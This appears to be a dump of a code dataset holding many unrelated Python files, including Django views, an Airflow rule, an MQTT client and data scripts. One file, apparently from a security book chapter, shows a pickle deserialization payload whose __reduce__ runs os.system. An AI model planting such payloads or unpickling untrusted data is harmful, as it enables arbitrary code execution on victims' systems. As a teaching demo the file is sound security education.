max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
---|---|---|---|---|---|---|
setup.py | fartbagxp/certspotter-api | 1 | 12786751 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
from setuptools import setup
from setuptools.command.install import install
VERSION = "1.0.12"
def readme():
"""print long description"""
with open('README.md') as f:
return f.read()
setup(name='certspotter',
version=VERSION,
description='sslmate CertSpotter API',
long_description=readme(),
long_description_content_type="text/markdown",
url="https://github.com/fartbagxp/certspotter-api",
author='<NAME>',
author_email='<EMAIL>',
py_modules=['certspotter'],
packages=['certspotter'],
package_dir={'certspotter': 'src/certspotter'},
license='MIT')
| 1.65625 | 2 |
services/schema.py | antti-mikael/open-city-profile | 0 | 12786752 | <reponame>antti-mikael/open-city-profile
import graphene
from django.db.utils import IntegrityError
from django.utils.translation import ugettext_lazy as _
from graphene_django.types import DjangoObjectType
from graphql import GraphQLError
from graphql_jwt.decorators import login_required
from .consts import SERVICE_TYPES
from .models import Service
class ServiceType(DjangoObjectType):
type = graphene.Field(graphene.String, source="service_type")
class Meta:
model = Service
fields = ("created_at",)
AllowedServiceType = graphene.Enum(
"type", [(st[0].upper(), st[0]) for st in SERVICE_TYPES]
)
class ServiceInput(graphene.InputObjectType):
type = AllowedServiceType()
class AddService(graphene.Mutation):
class Arguments:
service = ServiceInput(required=True)
service = graphene.Field(ServiceType)
@login_required
def mutate(self, info, **kwargs):
service_data = kwargs.pop("service")
service_type = service_data.get("type")
try:
service = Service.objects.create(
profile=info.context.user.profile, service_type=service_type
)
return AddService(service=service)
except IntegrityError:
raise GraphQLError(_("Service already exists for this profile!"))
class Mutation(graphene.ObjectType):
add_service = AddService.Field()
| 2.234375 | 2 |
search/views.py | isi-metaphor/propstore-gui | 0 | 12786753 | <filename>search/views.py
# coding: utf-8
# Copyright (C) University of Southern California (http://usc.edu)
# Author: <NAME> <<EMAIL>>
# URL: <http://nlg.isi.edu/>
# For more information, see README.md
# For license information, see LICENSE
import json
import logging
import microidx
import traceback
from microidx import MicroIndex
from django.http import HttpResponse
from django.shortcuts import render_to_response
logger = logging.getLogger(__name__)
def load_index(path):
try:
index = MicroIndex(path)
return index
except Exception:
return None
indexes = {
"eng": (load_index("index_eng.ldb"), "English"),
"eng_gen": (load_index("index_eng_gen.ldb"), "English (generalized)"),
"rus": (load_index("index_rus.ldb"), "Russian"),
"rus_gen": (load_index("index_rus_gen.ldb"), "Russian (generalized)"),
"spa": (load_index("index_spa.ldb"), "Spanish"),
"spa_gen": (load_index("index_spa_gen.ldb"), "Spanish (generalized)"),
}
def json_response(json_dict):
return HttpResponse(json.dumps(json_dict), status=200, content_type="application/json")
def home(request):
return render_to_response("index.html", {})
def about(request):
return render_to_response("about.html", {})
W_NONE = {"v": "<NONE>", "p":None, "w":[], "t":0}
W_EMPY = {"v": "<->", "p":None, "w":[], "t":0}
def format_arg(query_words, arg, max_len=16):
if arg == "<NONE>":
return W_NONE
if arg == "<->":
return W_EMPY
words = arg.split("||")
lastw_pos = words[-1].split("-")
if len(lastw_pos) > 2:
lastw = "-".join(lastw_pos[:-1])
pos = lastw_pos[-1]
else:
lastw, pos = lastw_pos
words[-1] = lastw
trimed = 0
if len(words) == 1:
visible = words[0]
else:
filtered = list(filter(lambda w: w in query_words, words))
if len(filtered) == 0:
filtered = words
elif len(filtered) != len(words):
trimed = 1
visible = filtered[0]
for w in filtered[1:]:
if len(visible) >= max_len:
trimed = 1
break
visible += ", "
visible += w
return {
"v": visible,
"p": pos,
"w": words,
"t": trimed,
}
def format_triples(query_words, triples):
result = []
for rel_type, a1, a2, a3, a4, a5, tr_fr, tr_no in triples:
result.append({
"t": rel_type,
"n": tr_no,
"f": tr_fr,
"a1": format_arg(query_words, a1),
"a2": format_arg(query_words, a2),
"a3": format_arg(query_words, a3),
"a4": format_arg(query_words, a4),
"a5": format_arg(query_words, a5),
})
return result
def find(request):
query = request.GET.get("query", "").encode("utf-8")
index = request.GET.get("index", None)
mfreq = request.GET.get("mfreq", "0")
rtype = request.GET.get("rtype", None)
rpage = request.GET.get("rpage", "1")
page_size = 256
freq = MicroIndex.parse_frequency(mfreq)
rpage = int(rpage)
logging.info("%r\t%r\t%r\t%r\t%r" % (query, index, mfreq, rtype, rpage))
if index is None or index not in indexes:
result = {
"error": True,
"error_code": 1,
"error_msg": "Index key '%r' not found." % index,
"found_triples": [],
"total_triples": 0,
"page_size": page_size,
"pages": 0,
"page": 0,
"index": index,
"mfreq": str(freq),
"rtype": rtype,
"query": str(query),
"query_words": [],
"url": request.build_absolute_uri(),
}
logging.error("Index key '%r' not found." % index)
return json_response(result)
mi_index = indexes[index][0]
try:
query = mi_index.parse_query(query)
except microidx.MicroIndexQueryParsingError:
error_msg = traceback.format_exc()
result = {
"error": True,
"error_code": 2,
"error_msg": "Error while parsing query: %r" % error_msg,
"found_triples": [],
"total_triples": 0,
"page_size": page_size,
"pages": 0,
"page": 0,
"index": index,
"mfreq": str(freq),
"rtype": rtype,
"query": str(query),
"query_words": [],
"url": request.build_absolute_uri(),
}
logging.error("Error while parsing query: %r" % error_msg)
return json_response(result)
query_words = [sq[0] for sq in query]
try:
page = int(rpage) - 1
if page < 0:
page = 0
offset = page * page_size
result_page, result_size, offset = mi_index.find(query,
limit=page_size,
offset=offset,
rel_type=rtype,
freq=freq,
)
for i, t in enumerate(result_page):
t[-1] = int(t[-1])
t.append(i + offset + 1)
pages = result_size / page_size + 1
result = {
"error": False,
"error_code": None,
"error_msg": None,
"found_triples": format_triples(query_words, result_page),
"total_triples": result_size,
"page_size": page_size,
"pages": pages,
"page": rpage,
"index": index,
"mfreq": str(freq),
"rtype": rtype,
"query": str(query),
"query_words": query_words,
"url": request.build_absolute_uri(),
}
except microidx.MicroIndexQueryExecutionError:
error_msg = traceback.format_exc()
result = {
"error": True,
"error_code": 3,
"error_msg": "Error while executing query: %r" % error_msg,
"found_triples": [],
"total_triples": 0,
"page_size": page_size,
"pages": 0,
"page": 0,
"index": index,
"mfreq": str(freq),
"rtype": rtype,
"query": query,
"query_words": query_words,
"url": request.build_absolute_uri(),
}
logging.error("Error while executing query: %r" % error_msg)
return json_response(result)
logging.info("Found %d results. Returned %d starting from %d." % (result_size, page_size, offset))
return json_response(result)
| 1.914063 | 2 |
coursera/course1-diving-in-python/week5/examples/socket_client.py | akrisanov/python_notebook | 3 | 12786754 | <filename>coursera/course1-diving-in-python/week5/examples/socket_client.py
import socket
sock = socket.socket()
sock.connect(("127.0.0.1", 9000))
# ^ one-liner: sock = socket.create_connection(("127.0.0.1", 9000))
sock.sendall("ping".encode("utf8"))
sock.close()
| 3.703125 | 4 |
airflow/upgrade/rules/chain_between_dag_and_operator_not_allowed_rule.py | shrutimantri/airflow | 0 | 12786755 | <reponame>shrutimantri/airflow
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
import re
from airflow import conf
from airflow.upgrade.rules.base_rule import BaseRule
from airflow.utils.dag_processing import list_py_file_paths
class ChainBetweenDAGAndOperatorNotAllowedRule(BaseRule):
title = "Chain between DAG and operator not allowed."
description = "Assigning task to a DAG using bitwise shift (bit-shift) operators are no longer supported."
def _change_info(self, file_path, line_number):
return "{} Affected file: {} (line {})".format(
self.title, file_path, line_number
)
def _check_file(self, file_path):
problems = []
with open(file_path, "r") as file_pointer:
lines = file_pointer.readlines()
python_space = r"\s*\\?\s*\n?\s*"
# Find all the dag variable names.
dag_vars = re.findall(r"([A-Za-z0-9_]+){}={}DAG\(".format(python_space, python_space),
"".join(lines))
history = ""
for line_number, line in enumerate(lines, 1):
# Someone could have put the bitshift operator on a different line than the dag they
# were using it on, so search for dag >> or << dag in all previous lines that did
# not contain a logged issue.
history += line
matches = [
re.search(r"DAG\([^\)]+\){}>>".format(python_space), history),
re.search(r"<<{}DAG\(".format(python_space), history)
]
for dag_var in dag_vars:
matches.extend([
re.search(r"(\s|^){}{}>>".format(dag_var, python_space), history),
re.search(r"<<\s*{}{}".format(python_space, dag_var), history),
])
if any(matches):
problems.append(self._change_info(file_path, line_number))
# If we found a problem, clear our history so we don't re-log the problem
# on the next line.
history = ""
return problems
def check(self):
dag_folder = conf.get("core", "dags_folder")
file_paths = list_py_file_paths(directory=dag_folder, include_examples=False)
problems = []
for file_path in file_paths:
problems.extend(self._check_file(file_path))
return problems
| 1.976563 | 2 |
pdfs_evolution_graphs.py | aherrera3/thesis | 0 | 12786756 | """
Script for the evolution gif of the pdfs obtained with qcdnum.
The pdfs obtained by the DGLAP evolution equations, using qcdnum, are stored in files, containing each one a fixed q2 energy scale.
The output files with the pdfs and x values are stored in the directory named output, inside qcdnum.
Those output files follows the following convention: nameCxxFile_q2_energyscale.csv
"""
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
import pandas as pd
import glob
from PIL import Image
import os
# to delete the old images
os.system("rm imgs/*.png imgs/*.gif")
# url of the directory where the output files of qcdnum script are stored.
output_directory_url = "/opt/qcdnum-17-01-14/output/"
save_imgs_url = "imgs/"
names = []
plt.rcParams.update({"font.size":13})
sns.set_style("darkgrid")
# for each .csv output file
for csv in glob.glob(output_directory_url + "*.csv"):
print(csv)
array = csv.split("_")
q = float(array[2][:-4])
dataset = pd.read_csv(csv, delimiter=" ")
dataset = dataset.set_index("x")
names.append(int(q*100))
plt.figure()
lp = sns.scatterplot(data=dataset.iloc[:,:]) #, palette=['orange']
lp.set(xscale="log")
lp.text(0.78, 1.2, r'$Q^2 = 2.56$GeV$^2$', fontsize=10)
plt.ylabel("$x$pdf")
plt.xlabel("$x$")
plt.title(f"$Q^2$ = {q:.2e} $GeV^2$")
plt.ylim((0.0, 1.0))
plt.xlim((10e-3, 1))
plt.savefig(save_imgs_url + str(int(q*100)) + ".png", dpi=300)
names.sort()
# Create the frames
frames = []
imgs = [save_imgs_url + str(x) + ".png" for x in names]
for i in imgs:
new_frame = Image.open(i)
frames.append(new_frame)
# Save into a GIF file that loops forever
frames[0].save(save_imgs_url+'pdfs_evolution_gif.gif', format='GIF',
append_images=frames[1:],
save_all=True,
duration=10, loop=0) | 2.703125 | 3 |
WindmillProject/models/K-means.py | Nienkedn/Nieuwsanalyse8 | 0 | 12786757 | <filename>WindmillProject/models/K-means.py<gh_stars>0
from sklearn.feature_extraction.text import TfidfVectorizer
from stop_words import get_stop_words
from sklearn.cluster import KMeans
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.metrics import adjusted_rand_score
from collections import Counter
# These are the csv files, we are going to use for our script
omroepzeeland = open("../Data/omroep_zeeland.csv", mode="r", encoding="utf-16")
nu = list(open("../Data/nu_nl.csv", mode="r", encoding="utf-16"))[1:]
tweets = open("../Data/tweets.csv", mode="r", encoding="utf-16")
# The csv files will be passed through and if the texts contains stopwords, all of them will be removed from the resulting tokens. It will be converted to a matrix of TF-IDF features.
stop_words = get_stop_words('dutch')
my_stop_words = (["null", "http", "bit", "www", "https", "html", "ly", "nl", "com", "origin", "Timestamp", "Content", "Title", "Comment_count", "Retweet_count", "twitter", "000", "10", "11", "12", "13",
"14", "17", "rtvu"])
vectorizer = TfidfVectorizer(stop_words = stop_words + my_stop_words)
# X = vectorizer.fit_transform(omroepzeeland)
Y = vectorizer.fit_transform(nu)
# Z = vectorizer.fit_transform(tweets)
terms = vectorizer.get_feature_names()
# Clusters the data in groups of equal variance, minimizing a criterion known as the inertia or within-cluster sum-of-squares
true_k = 5
model = KMeans(n_clusters=true_k, init='k-means++', max_iter=1000, n_init=10, random_state=5)
# model.fit(X)
model.fit(Y)
# model.fit(Z)
# Print the results
print("Top terms per cluster:")
order_centroids = model.cluster_centers_.argsort()[:, ::-1]
for i in range(true_k):
print("\n""Cluster %d:" % i),
for ind in order_centroids[i, :10]:
print(' %s' % terms[ind]),
# Explanation of the model, script en TFIDF
# We hebben zo ingesteld dat er uit de drie bronnen(nu.nl, twitter en omroepzeeland) vijf clusters gemaakt moeten worden. Eerst worden uit de drie bronnen de stopwoorden eruit gefilterd. Daarna word er door
# middel van term frequency-inverse document frequency aka TFIDF aan ieder woord een cijfer gegeven om zo aan te geven hoe belangrijk het woord is voor de tekst. Deze informatie wordt door het K-means algoritme
# gebruikt om de belangrijkste woorden te groeperen in clusters. Hierbij staan de belangrijkste woorden in cluster 1 en de minder belangrijke woorden in het laatste cluster
print(Y)
print(vectorizer.get_feature_names())
# print(pd.DataFrame(X.toarray(), columns=vectorizer.get_feature_names()))
# Mee bezig, zie http://jonathansoma.com/lede/foundations/classes/text%20processing/tf-idf/
word1 = 'windmolens'
word2 = 'energie'
xdata = model.cluster_centers_[:,vectorizer.vocabulary_[word1]]
ydata = model.cluster_centers_[:,vectorizer.vocabulary_[word2]]
plt.scatter(xdata, ydata, s=1)
for clusternum, (xcoord,ycoord) in enumerate(zip(xdata, ydata)):
plt.text(xcoord, ycoord, str(clusternum))
plt.title('TFIDF score in cluster')
plt.xlabel(word1)
plt.ylabel(word2)
plt.show()
print(Counter(model.labels_))
nu1 = [text for clusternum, text in zip(model.labels_,nu) if clusternum == 3]
print(nu1)
# regex bij token pattern
# woordcloud maken van die woorden en selecteren van onderscheidende woorden
| 3.34375 | 3 |
Project Euler/general.py | pybae/etc | 0 | 12786758 | <reponame>pybae/etc
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# A general purpose file including several blanket functions to simplify Project
# Euler code
import numpy
import math
import cProfile
import pstats
import StringIO
def prime(n):
return filter(lambda num: (num % \
numpy.arange(2, 1+int(math.sqrt(num)))).all(), range(2, n+1))
pr = cProfile.Profile()
pr.enable()
array = prime(1000)
pr.disable()
s = StringIO.StringIO()
sortby = 'cumulative'
ps = pstats.Stats(pr, stream=s).sort_stats(sortby)
ps.print_stats()
| 2.421875 | 2 |
ghostwriter/rolodex/migrations/0013_projectsubtask_marked_complete.py | bbhunter/Ghostwriter | 601 | 12786759 | # Generated by Django 3.0.10 on 2021-02-11 21:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('rolodex', '0012_auto_20210211_1853'),
]
operations = [
migrations.AddField(
model_name='projectsubtask',
name='marked_complete',
field=models.DateField(blank=True, help_text='Date the task was marked complete', null=True, verbose_name='Marked Complete'),
),
]
| 1.492188 | 1 |
resources/drive.py | MujyKun/IreneAPI | 1 | 12786760 | <reponame>MujyKun/IreneAPI<gh_stars>1-10
from __future__ import print_function
import pickle
import os.path
import io
# noinspection PyPackageRequirements
from googleapiclient.http import MediaIoBaseDownload
# noinspection PyPackageRequirements
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
# noinspection PyPackageRequirements
from google.auth.transport.requests import Request
def get_drive_connection():
scopes = ['https://www.googleapis.com/auth/drive']
cred = None
if os.path.exists(f'token.pickle'):
with open(f'token.pickle', 'rb') as token:
try:
cred = pickle.load(token)
except Exception as e:
print(e)
# If there are no (valid) credentials available, let the user log in.
if not cred or not cred.valid:
if cred and cred.expired and cred.refresh_token:
cred.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'credentials.json', scopes)
cred = flow.run_local_server(port=0)
# Save the credentials for the next run
with open(f'token.pickle', 'wb') as token:
pickle.dump(cred, token)
drive_service = build('drive', 'v3', credentials=cred)
return drive_service
drive = get_drive_connection()
def get_file_type(file_id):
"""Get the file type of a drive file.
ex: image.jpeg or media.mp4"""
file_data = get_file_data(file_id)
file_type = file_data.get('mimeType')
if file_type:
return file_type.replace('/', '.')
return file_data.get('mimeType')
def get_file_data(file_id):
"""Get the file data of a drive file."""
return drive.files().get(fileId=file_id).execute()
def download_media(file_id, file_location):
media = drive.files().get_media(fileId=file_id)
fh = io.BytesIO()
downloader = MediaIoBaseDownload(fh, media)
done = False
while done is False:
status, done = downloader.next_chunk()
# print percentage of download
print("Download %d%%." % int(status.progress() * 100))
with open(file_location, 'wb') as f:
fh.seek(0) # go to start of stream
f.write(fh.read())
try:
fh.close()
except Exception as e:
print(e, "--download")
| 2.734375 | 3 |
mqtt/ping.py | Laged/test-python-ping-mqtt | 0 | 12786761 | <gh_stars>0
import socket
from time import sleep
import paho.mqtt.client as mqtt
hostname = socket.gethostname()
broker = 'broker.hivemq.com'
port = 1883
default_user = hostname
default_pw = None
default_topic = '/ping-mqtt/' + hostname
default_msg = 'ping'
default_qos = 0
ping_interval = 1
running = True
subscribed = False
def __ping_loop(client):
while running:
if subscribed:
print 'Pinging',default_topic
client.publish(default_topic, default_msg)
sleep(ping_interval)
def __on_connect(client, userdata, flags, rc):
if rc == 0:
username = userdata['user'] if 'user' in userdata else None
print 'Connection',str(username),'to',str(client._host)+':'+str(client._port),'OK'
print 'Subscribing to',str(default_topic),'with QoS',str(default_qos)
client.subscribe(default_topic, default_qos)
else:
print 'Connection failed with code',rc
def __on_message(client, userdata, msg):
print 'Message ' + msg.topic+': '+str(msg.payload)
def __on_subscribe(client, userdata, mid, granted_qos):
topic = userdata['topic'] if 'topic' in userdata else None
print 'Subscription to',topic,'with QoS',str(granted_qos),'OK'
global subscribed
subscribed = True
def init():
print 'Initializing client that pings a MQTT broker'
defaults = {
'user':default_user,
'password':<PASSWORD>,
'topic': default_topic,
'msg': default_msg
}
client = mqtt.Client()
client.username_pw_set(default_user, default_pw)
client.user_data_set(defaults)
client.on_connect = __on_connect
client.on_message = __on_message
client.on_subscribe = __on_subscribe
print 'Connecting',hostname,'to',broker+':'+str(port)
client.loop_start()
client.connect(broker, port)
__ping_loop(client)
if __name__ == '__main__':
init()
| 2.59375 | 3 |
dwh/indicator_lib.py | LaudateCorpus1/openmrs-fhir-analytics | 0 | 12786762 | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Set of functions to work with Spark DataFrames containing FHIR resources.
See test_spark.ipynb for real examples of how to create/use these functions.
"""
# TODO move common and query related parts to `query_lib.py` and only keep
# indicator calculation logic that is independent of Spark here.
from typing import List
from datetime import datetime
from dateutil.parser import parse as parse_date
import pandas as pd
import common
import query_lib
def _find_age_band(birth_date: str, end_date: datetime) -> str:
"""Given the birth date, finds the age_band for PEPFAR disaggregation."""
birth = parse_date(birth_date)
age = int((end_date - birth).days / 365.25)
if age < 1:
return '0-1'
if age <= 4:
return '1-4'
if age <= 9:
return '5-9'
if age <= 14:
return '10-14'
if age <= 19:
return '15-19'
if age <= 24:
return '20-24'
if age <= 49:
return '25-49'
return '50+'
def _agg_buckets(birth_date: str, gender: str, end_date: datetime) -> List[str]:
"""Generates the list of all PEPFAR disaggregation buckets."""
age_band = _find_age_band(birth_date, end_date)
return [age_band + '_' + gender, 'ALL-AGES_' + gender,
age_band + '_ALL-GENDERS', 'ALL-AGES_ALL-GENDERS']
def _gen_counts_and_ratio(temp_df: pd.DataFrame, end_date: datetime,
ind_name: str) -> pd.DataFrame:
"""Generates aggregated dataframe when supplied with patient-level df"""
temp_df['buckets'] = temp_df.apply(
lambda x: _agg_buckets(x.birthDate, x.gender, end_date), axis=1)
temp_df_exp = temp_df.explode('buckets')
temp_df_exp = temp_df_exp.groupby(
[ind_name, 'buckets'], as_index=False).count()[[
ind_name, 'buckets', 'patientId']].rename(
columns={'patientId': ind_name + '_count'})
# calculate ratio
num_patients = len(temp_df.index)
temp_df_exp[ind_name + '_ratio'] = temp_df_exp[
ind_name + '_count'] / num_patients
return temp_df_exp
def calc_TX_PVLS(patient_agg_obs: pd.DataFrame, VL_code: str,
failure_threshold: int, end_date_str: str = None) -> pd.DataFrame:
"""Calculates TX_PVLS indicator with its corresponding disaggregations.
Args:
patient_agg_obs: An output from `patient_query.find_patient_aggregates()`.
VL_code: The code for viral load values.
failure_threshold: VL count threshold of failure.
end_date: The string representation of the last date as 'YYYY-MM-DD'.
Returns:
The aggregated DataFrame with age/gender buckets.
"""
end_date = datetime.today()
if end_date_str:
end_date = parse_date(end_date_str)
temp_df = patient_agg_obs[(patient_agg_obs['code'] == VL_code)].copy()
# Note the above copy is used to avoid setting a new column on a slice next:
temp_df['latest_vl_value'] = temp_df['last_value'].astype(float)
temp_df['sup_VL'] = (temp_df['latest_vl_value'] < failure_threshold)
temp_df = _gen_counts_and_ratio(temp_df, end_date, 'sup_VL')
return temp_df
def calc_TX_NEW(patient_agg_obs: pd.DataFrame, ARV_plan: str,
start_drug: List[str], end_date_str: str = None) -> pd.DataFrame:
"""Calculates TX_NEW indicator with its corresponding disaggregations.
TX_NEW indicator counts the number of adults and children newly enrolled
on antiretroviral therapy (ART) prior to the provided end-date
Args:
patient_agg_obs: A DataFrame generated by `patient_query.find_patient_aggregates()`.
ARV_plan: The concept question code for ANTIRETROVIRAL PLAN
start_drug: The concept answer codes for START DRUG
end_date: The string representation of the last date as 'YYYY-MM-DD'.
Returns:
The aggregated DataFrame with age/gender buckets.
"""
end_date = datetime.today()
if end_date_str:
end_date = parse_date(end_date_str)
temp_df = patient_agg_obs[(patient_agg_obs['code'] == ARV_plan)].copy()
# Note the above copy is used to avoid setting a new column on a slice next:
temp_df['TX_NEW'] = (temp_df['last_value_code'].isin(start_drug))
temp_df = _gen_counts_and_ratio(temp_df, end_date, 'TX_NEW')
return temp_df | 2.546875 | 3 |
chapter11/code/pickle_safe_chroot.py | gabrielmahia/ushuhudAI | 74 | 12786763 | import os
import pickle
from contextlib import contextmanager
class ShellSystemChroot(object):
def __reduce__(self):
# this will list contents of root / folder
return (os.system, ('ls /',))
@contextmanager
def system_chroot():
""" A simple chroot """
os.chroot('/')
yield
def serialize():
with system_chroot():
shellcode = pickle.dumps(ShellSystemChroot())
return shellcode
def deserialize(exploit_code):
with system_chroot():
pickle.loads(exploit_code)
if __name__ == '__main__':
shellcode = serialize()
print('Obtaining files...')
deserialize(shellcode)
| 2.78125 | 3 |
Heatmap.py | Ruhen-Bhuiyan/Logistic-regression-vs-SVM-vs-Decision-Tree-vs-Random-Forest | 0 | 12786764 | <filename>Heatmap.py
import pandas as pd
import numpy as np
from sklearn import preprocessing
from sklearn.metrics import confusion_matrix
from sklearn import svm
import itertools
import matplotlib.pyplot as plt
import matplotlib.mlab as mlab
import seaborn
get_ipython().run_line_magic('matplotlib', 'inline')
data = pd.read_csv("D:\\445\\KhidmahActuall.csv")
df = pd.DataFrame(data)
df_corr = df.corr()
plt.figure(figsize=(15,10))
seaborn.heatmap(df_corr, cmap="YlGnBu") # Displaying the Heatmap
seaborn.set(font_scale=2,style='white')
plt.title('Heatmap correlation')
plt.show()
| 3.125 | 3 |
Project Euler #1: Multiples of 3 and 5/Python.py | gitvy/Project-Euler | 0 | 12786765 | for i in range(int(input())):
n = int(input()) -1
l1 = n - n%3
l2 = n - n%5
l3 = n - n%15
s1 = ((l1)*(3+l1))//6
s2 = ((l2)*(5+l2))//10
s3 = ((l3)*(15+l3))//30
print(s1+s2-s3)
| 3.171875 | 3 |
carim/configuration/mods/vanilla_plus_plus_map/model.py | schana/dayz-server-carim | 3 | 12786766 | <reponame>schana/dayz-server-carim<filename>carim/configuration/mods/vanilla_plus_plus_map/model.py<gh_stars>1-10
from collections import namedtuple
from carim.global_resources import locations
def get_markers():
return [Marker(
name=m[0],
icon=Icon.DEFAULT,
color=WHITE,
position=m[1],
active=True,
active_3d=True
) for m in locations.marks]
def get_config():
return {
'M_STATIC_MARKER_ARRAY': [m.get_config() for m in get_markers()],
'm_CanUse3DMarkers': 1,
'm_OwnPositionMarkerDisabled': 0,
'm_ForceMapItemOnly': 0
}
def get_admin_teleport_config():
return {
'm_TeleportLocations': [m.get_admin_teleport_config() for m in get_markers()]
}
class Marker:
def __init__(self, name, icon, color, position, active, active_3d):
self.name = name
self.icon = icon
self.color = color
self.position = position
self.active = active
self.active_3d = active_3d
def get_config(self):
return {
'M_MARKER_NAME': self.name,
'M_ICON_PATH': self.icon,
'M_COLOR': [self.color.r, self.color.g, self.color.b],
'M_POSITION': [self.position.x, 0, self.position.z],
'M_ISACTIVE': 1 if self.active else 0,
'M_IS_3D_ACTIVE': 1 if self.active_3d else 0
}
def get_admin_teleport_config(self):
return {
'm_Name': self.name,
'm_Position': [
self.position.x,
0,
self.position.z
]
}
Color = namedtuple('Color', ('r', 'g', 'b'))
WHITE = Color(255, 255, 255)
RED = Color(255, 0, 0)
GREEN = Color(0, 255, 0)
BLUE = Color(0, 0, 255)
class Icon:
DEFAULT = "VanillaPPMap\\GUI\\Textures\\CustomMapIcons\\waypointeditor_CA.paa"
| 1.945313 | 2 |
src/test_import.py | usdot-its-jpo-data-portal/canary-lambda | 0 | 12786767 | <gh_stars>0
import unittest
import os
class TestImports(unittest.TestCase):
def test_imports(self):
print('Temporary dummy import test for coverage config.')
import main | 1.679688 | 2 |
huobi/model/pricedepthevent.py | Wing-Lo/huobi_Python | 0 | 12786768 | <gh_stars>0
from huobi.model import *
class PriceDepthEvent:
"""
The price depth received by subscription of price depth.
:member
symbol: The symbol you subscribed.
timestamp: The UNIX formatted timestamp generated by server in UTC.
data: The price depth.
"""
def __init__(self):
self.symbol = ""
self.timestamp = 0
self.data = PriceDepth()
| 2.375 | 2 |
src/filters.py | git2samus/xpost-bot | 16 | 12786769 | class SubmissionFilter(object):
""" methods to determine whether a submission is relevant for reposting """
def __init__(self, settings):
""" store settings """
self.settings = settings
def _is_valid_submitter(self, submission):
""" returns True when the submission isn't from an ignored submitter or the submitter deleted his account """
ignored_submitters = self.settings['ignored_submitters']
if not submission.author:
return True # allow [deleted]
author_name = submission.author.name.lower()
return author_name not in ignored_submitters
def _is_valid_subreddit(self, submission):
""" returns True when the submission hasn't been done on an ignored subreddit """
ignored_subreddits = self.settings['ignored_subreddits']
subreddit_name = submission.subreddit.display_name.lower()
return subreddit_name not in ignored_subreddits
def _test_text(self, text, target_keywords=None, target_regexps=None):
""" returns True when 'text' contains any of the target_keywords or matches any of the target_regexps """
target_keywords = [] if target_keywords is None else target_keywords
target_regexps = [] if target_regexps is None else target_regexps
text = text.lower()
return any(
keyword in text for keyword in target_keywords
) or any(
regexp.search(text) for regexp in target_regexps
)
def _test_matches(self, submission):
""" returns True when the submission's title or selftext contains any of the matched_keywords or matches any of the matched_regexps """
matched_keywords = self.settings['matched_keywords']
matched_regexps = self.settings['matched_regexps']
match = self._test_text(submission.title, matched_keywords, matched_regexps)
if not match and submission.is_self:
match = self._test_text(submission.selftext, matched_keywords, matched_regexps)
return match
def _test_exclusions(self, submission):
""" returns True when the submission's title or selftext contains any of the excluded_keywords or matches any of the excluded_regexps """
excluded_keywords = self.settings['excluded_keywords']
excluded_regexps = self.settings['excluded_regexps']
excluded = self._test_text(submission.title, excluded_keywords, excluded_regexps)
if not excluded and submission.is_self:
excluded = self._test_text(submission.selftext, excluded_keywords, excluded_regexps)
return excluded
def filter_submission(self, submission):
""" determine whether this submission should be filtered or not, returns True when the sumission:
-isn't from an ignored submitter
-hasn't been posted on an ignored subreddit
-contains any of the matched_keywords or matches any of the matched_regexps
-doesn't contain any of the excluded_keywords or matches any of the excluded_regexps
"""
return all((
self._is_valid_submitter(submission),
self._is_valid_subreddit(submission),
self._test_matches(submission),
not self._test_exclusions(submission),
))
def filter_stream(self, stream):
""" apply self.filter_submission to each element of the stream """
for submission in stream:
if self.filter_submission(submission):
yield submission
| 3.34375 | 3 |
tests/test_mock_audio.py | CameronJRAllan/eTree-Browser | 1 | 12786770 | <reponame>CameronJRAllan/eTree-Browser
from unittest import TestCase
import os
import mock
import pytest
from PyQt5 import QtWidgets
import application
import audio
class TestApplication():
@pytest.fixture(scope="function", autouse=True)
def setup(self, qtbot):
# Create dialog to show this instance
self.dialog = QtWidgets.QMainWindow()
# Start main event loop
self.prog = application.mainWindow(self.dialog)
| 2.25 | 2 |
public-engines/iris-h2o-automl/marvin_iris_h2o_automl/training/metrics_evaluator.py | guialba/incubator-marvin | 101 | 12786771 | #!/usr/bin/env python
# coding=utf-8
"""MetricsEvaluator engine action.
Use this module to add the project main code.
"""
from .._compatibility import six
from .._logging import get_logger
from marvin_python_toolbox.engine_base import EngineBaseTraining
from ..model_serializer import ModelSerializer
__all__ = ['MetricsEvaluator']
logger = get_logger('metrics_evaluator')
class MetricsEvaluator(ModelSerializer, EngineBaseTraining):
def __init__(self, **kwargs):
super(MetricsEvaluator, self).__init__(**kwargs)
def execute(self, params, **kwargs):
import h2o
from sklearn import metrics
# h2o.init()
y_test = self.marvin_dataset['test_X']['Species']
self.marvin_dataset['test_X'].drop(columns='Species', inplace=True)
teste = h2o.H2OFrame.from_python(self.marvin_dataset['test_X'])
preds = self.marvin_model.predict(teste).as_data_frame()['predict'].values
self.marvin_metrics = metrics.accuracy_score(y_test, preds)
| 2.28125 | 2 |
bettertexts/migrations/0001_initial.py | citizenline/citizenline | 0 | 12786772 | # Generated by Django 2.2.3 on 2019-09-26 19:42
import bettertexts.models
import ckeditor.fields
from decimal import Decimal
from django.conf import settings
import django.contrib.sites.managers
from django.db import migrations, models
